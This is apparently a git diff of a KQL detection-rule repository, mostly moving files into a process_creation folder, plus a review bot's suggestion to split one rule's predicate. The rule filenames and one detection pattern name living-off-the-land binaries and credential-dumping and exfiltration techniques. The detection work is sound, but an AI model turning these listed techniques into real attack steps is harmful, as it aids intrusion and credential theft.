diff --git a/KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql b/KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql similarity index 100% rename from KQL/rules/Defense Evasion/imagingdevices_unusual_parent_child_processes.kql rename to KQL/rules/windows/process_creation/imagingdevices_unusual_parent_child_processes.kql diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql similarity index 100% rename from KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql rename to KQL/rules/windows/process_creation/import_ldap_data_interchange_format_file_via_ldifde_exe.kql diff --git a/KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql b/KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql similarity index 100% rename from KQL/rules/Execution/import_powershell_modules_from_suspicious_directories_proccreation.kql rename to KQL/rules/windows/process_creation/import_powershell_modules_from_suspicious_directories_proccreation.kql diff --git a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql similarity index 100% rename from KQL/rules/Persistence/imports_registry_key_from_a_file.kql rename to KQL/rules/windows/process_creation/imports_registry_key_from_a_file.kql diff --git a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql b/KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql similarity index 100% rename from KQL/rules/Persistence/imports_registry_key_from_an_ads.kql rename to KQL/rules/windows/process_creation/imports_registry_key_from_an_ads.kql 
diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql similarity index 100% rename from KQL/rules/Defense Evasion/indirect_command_execution_by_program_compatibility_wizard.kql rename to KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql diff --git a/KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/indirect_command_execution_from_script_file_via_bash_exe.kql rename to KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql diff --git a/KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/indirect_inline_command_execution_via_bash_exe.kql rename to KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql diff --git a/KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/infdefaultinstall_exe_inf_execution.kql rename to KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql diff --git a/KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/insecure_proxy_doh_transfer_via_curl_exe.kql rename to KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql 
diff --git a/KQL/rules/Execution/insecure_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/insecure_transfer_via_curl_exe.kql rename to KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql similarity index 100% rename from KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql rename to KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql similarity index 100% rename from KQL/rules/Execution/installation_of_wsl_kali_linux.kql rename to KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql diff --git a/KQL/rules/Persistence/interactive_at_job.kql b/KQL/rules/windows/process_creation/interactive_at_job.kql similarity index 100% rename from KQL/rules/Persistence/interactive_at_job.kql rename to KQL/rules/windows/process_creation/interactive_at_job.kql 
diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql similarity index 100% rename from KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql rename to KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql diff --git a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql similarity index 100% rename from KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql rename to KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_clip_launcher.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_compress_obfuscation.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_obfuscated_iex_invocation.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql 
diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_stdin_launcher.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_var_launcher_obfuscation.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_via_stdin.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_via_use_clip.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql diff --git a/KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql similarity index 100% rename from KQL/rules/Defense Evasion/invoke_obfuscation_via_use_mshta.kql rename to KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql 
diff --git a/KQL/rules/Execution/java_running_with_remote_debugging.kql b/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql similarity index 100% rename from KQL/rules/Execution/java_running_with_remote_debugging.kql rename to KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/windows/process_creation/jscript_compiler_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/jscript_compiler_execution.kql rename to KQL/rules/windows/process_creation/jscript_compiler_execution.kql diff --git a/KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/kavremover_dropped_binary_lolbin_usage.kql rename to KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql diff --git a/KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql b/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql similarity index 100% rename from KQL/rules/Defense Evasion/kernel_memory_dump_via_livekd.kql rename to KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql diff --git a/KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/launch_vsdevshell_ps1_proxy_execution.kql rename to KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql 
diff --git a/KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql similarity index 100% rename from KQL/rules/Credential Access/loaded_module_enumeration_via_tasklist_exe.kql rename to KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql diff --git a/KQL/rules/Discovery/local_accounts_discovery.kql b/KQL/rules/windows/process_creation/local_accounts_discovery.kql similarity index 100% rename from KQL/rules/Discovery/local_accounts_discovery.kql rename to KQL/rules/windows/process_creation/local_accounts_discovery.kql diff --git a/KQL/rules/Execution/local_file_read_using_curl_exe.kql b/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql similarity index 100% rename from KQL/rules/Execution/local_file_read_using_curl_exe.kql rename to KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql similarity index 100% rename from KQL/rules/Execution/logged_on_user_password_change_via_ksetup_exe.kql rename to KQL/rules/windows/process_creation/logged_on_user_password_change_via_ksetup_exe.kql 
diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
similarity index 85%
rename from KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
rename to KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
index 1b4ef6c4..cb596131 100644
--- a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
+++ b/KQL/rules/windows/process_creation/lol_binary_copied_from_system_directory.kql
@@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.t1036.003 DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
+| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe" or ProcessCommandLine
contains "\\ie4uinit.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql
similarity index 100%
rename from KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql
rename to KQL/rules/windows/process_creation/lolbas_data_exfiltration_by_datasvcutil_exe.kql
diff --git a/KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/lolbin_runexehelper_use_as_proxy.kql
rename to KQL/rules/windows/process_creation/lolbin_runexehelper_use_as_proxy.kql
diff --git a/KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql b/KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/lolbin_unregmp2_exe_use_as_proxy.kql
rename to KQL/rules/windows/process_creation/lolbin_unregmp2_exe_use_as_proxy.kql
diff --git a/KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/lsa_ppl_protection_disabled_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/lsa_ppl_protection_disabled_via_reg_exe.kql
diff --git a/KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql b/KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql
similarity index 100%
rename from KQL/rules/Credential Access/lsass_dump_keyword_in_commandline.kql
rename to KQL/rules/windows/process_creation/lsass_dump_keyword_in_commandline.kql
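Review bot: The new `\\ie4uinit.exe` term is spliced into a single ~1,000-character `| where` predicate in lol_binary_copied_from_system_directory.kql, so the rule's three independent conditions (a copy capability, a watched LOLBIN name, a system-directory path) cannot be reviewed or diffed one at a time, and the `\ No newline at end of file` marker carries over to the new side. Because the predicate is `(copy-tool) and (lolbin-list) and (sysdir-list)`, it can be split into three consecutive `| where` stages with a one-line comment each, which is semantically identical and makes future list edits like this one a one-line diff. The rule's header comment (lines 1-6 of the file) is outside the hunk, so if it enumerates the watched binaries it should name `ie4uinit.exe` too; end the file with a trailing newline while touching it.
```kql
DeviceProcessEvents
// stage 1: a copy capability — cmd.exe "copy", robocopy/xcopy, or PowerShell copy verbs/aliases
| where (ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe")
    or (FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe" or ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))
    or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
// stage 2: the command line names one of the watched LOLBINs (ie4uinit.exe added in this change)
| where ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe" or ProcessCommandLine contains "\\ie4uinit.exe"
// stage 3: the command line references a system directory
| where ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"
```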
diff --git a/KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Credential Access/lsass_process_reconnaissance_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/lsass_process_reconnaissance_via_findstr_exe.kql diff --git a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql similarity index 100% rename from KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql rename to KQL/rules/windows/process_creation/malicious_base64_encoded_powershell_keywords_in_command_lines.kql diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql similarity index 100% rename from KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql rename to KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql diff --git a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql similarity index 100% rename from KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql rename to KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql 
diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql similarity index 100% rename from KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql rename to KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql diff --git a/KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql b/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/mavinject_inject_dll_into_running_process.kql rename to KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql diff --git a/KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql similarity index 100% rename from KQL/rules/Credential Access/microsoft_iis_connection_strings_decryption.kql rename to KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql diff --git a/KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql similarity index 100% rename from KQL/rules/Credential Access/microsoft_iis_service_account_password_dumped.kql rename to KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql diff --git a/KQL/rules/Execution/mmc20_lateral_movement.kql b/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql similarity index 100% rename from KQL/rules/Execution/mmc20_lateral_movement.kql rename to KQL/rules/windows/process_creation/mmc20_lateral_movement.kql 
diff --git a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql similarity index 100% rename from KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql rename to KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql diff --git a/KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql b/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql similarity index 100% rename from KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql rename to KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql diff --git a/KQL/rules/Defense Evasion/modify_group_policy_settings.kql b/KQL/rules/windows/process_creation/modify_group_policy_settings.kql similarity index 100% rename from KQL/rules/Defense Evasion/modify_group_policy_settings.kql rename to KQL/rules/windows/process_creation/modify_group_policy_settings.kql diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql similarity index 100% rename from KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql rename to KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql rename to KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql 
diff --git a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql b/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql similarity index 100% rename from KQL/rules/Persistence/msexchange_transport_agent_installation.kql rename to KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql similarity index 100% rename from KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql rename to KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql similarity index 100% rename from KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql rename to KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql similarity index 100% rename from KQL/rules/Defense Evasion/msiexec_quiet_installation.kql rename to KQL/rules/windows/process_creation/msiexec_quiet_installation.kql diff --git a/KQL/rules/Defense Evasion/msiexec_web_install.kql b/KQL/rules/windows/process_creation/msiexec_web_install.kql similarity index 100% rename from KQL/rules/Defense Evasion/msiexec_web_install.kql rename to KQL/rules/windows/process_creation/msiexec_web_install.kql 
diff --git a/KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql similarity index 100% rename from KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql rename to KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql diff --git a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql similarity index 100% rename from KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql rename to KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/windows/process_creation/msxsl_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/msxsl_exe_execution.kql rename to KQL/rules/windows/process_creation/msxsl_exe_execution.kql diff --git a/KQL/rules/Execution/net_webclient_casing_anomalies.kql b/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql similarity index 100% rename from KQL/rules/Execution/net_webclient_casing_anomalies.kql rename to KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql diff --git a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql similarity index 100% rename from KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql rename to KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql 
diff --git a/KQL/rules/Discovery/network_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql
similarity index 100%
rename from KQL/rules/Discovery/network_reconnaissance_activity.kql
rename to KQL/rules/windows/process_creation/network_reconnaissance_activity.kql
diff --git a/KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql
diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
rename to KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql
diff --git a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql
rename to KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql
diff --git a/KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
rename to KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
diff --git a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql
diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql
similarity index 100%
rename from KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql
rename to KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql
diff --git a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql b/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql
similarity index 100%
rename from KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql
rename to KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql
diff --git a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql
diff --git a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql
diff --git a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql
rename to KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql
diff --git a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/new_process_created_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql
diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
rename to KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
